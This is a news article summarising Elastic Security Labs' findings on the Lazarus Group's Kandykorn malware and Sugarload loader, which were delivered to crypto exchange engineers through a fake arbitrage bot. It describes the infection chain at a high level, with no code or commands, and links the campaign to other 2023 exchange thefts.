Elastic Security Labs recently unveiled a significant cybersecurity development. The Lazarus Group’s endeavor to breach a cryptocurrency exchange using a novel form of malware known as “Kandykorn.” Accompanying this malware was the loader program, “Sugarload,” recognized by its distinctive “.sld” extension. While the specific exchange targeted was not disclosed, the methodology employed by the Lazarus Group raises substantial concerns.
Elastic Security Labs unveils Lazarus Group’s activities
In 2023, a surge in private-key hacks within crypto exchanges, mostly attributed to the North Korean cybercrime group, Lazarus Group, has been observed. The Lazarus Group’s modus operandi in this attack involved masquerading as blockchain engineers, engaging with engineers associated with the unnamed crypto exchange via Discord. Posing as collaborators, they offered an arbitrage bot that purportedly could exploit cryptocurrency price differences across various exchanges.
By disguising the files within the program’s ZIP folder as “config.py” and “pricetable.py,” resembling an arbitrage bot, they successfully convinced the engineers to download what seemed to be a beneficial “bot.” Upon execution, the program initiated a “Main.py” file, which included both harmless programs and a malicious component, “Watcher.py.” Watcher.py established a connection with a remote Google Drive account, downloading content to a file named “testSpeed.py.”
After a one-time execution, testSpeed.py downloaded additional content and executed a file called “Sugarloader.” The malevolent Sugarloader file was concealed using a “binary packer,” enabling it to evade most malware detection systems. Elastic identified it by interrupting the program after the initialization functions had commenced and snapshotting the process’s virtual memory. Despite being labeled as non-malicious by VirusTotal malware detection, Sugarloader managed to download Kandykorn onto the system upon connecting to a remote server.
Rising cybersecurity challenges in the crypto sector in 2023
Kandykorn, residing in the device’s memory, boasts various functionalities that empower the remote server to execute malicious activities. For instance, commands like “0xD3” could list the contents of a victim’s computer directory, and “resp_file_down” could transfer the victim’s files to the attacker’s system. Elastic suggested that the attack likely transpired in April 2023, signifying an ongoing threat with continuous development of tools and techniques for malicious intents.
This development aligns with the prevailing trend observed in 2023, where centralized crypto exchanges and apps encountered multiple attacks. Alphapo, CoinsPaid, Atomic Wallet, Coinex, and Stake were among the targets, with attacks involving the theft of private keys from victims’ devices, enabling the transfer of customers’ cryptocurrency to the attackers’ addresses. Authorities, including the United States Federal Bureau of Investigation, linked several of these attacks to the Lazarus Group.
Incidents such as the Coinex hack and the Stake attack were associated with this cybercrime entity. The emergence of Kandykorn and its associated loader, Sugarload, within the context of the Lazarus Group’s activities poses a considerable security concern within the cryptocurrency sphere. The persistent nature of these threats necessitates increased vigilance and continuous improvements in security measures to counter such malevolent activities.
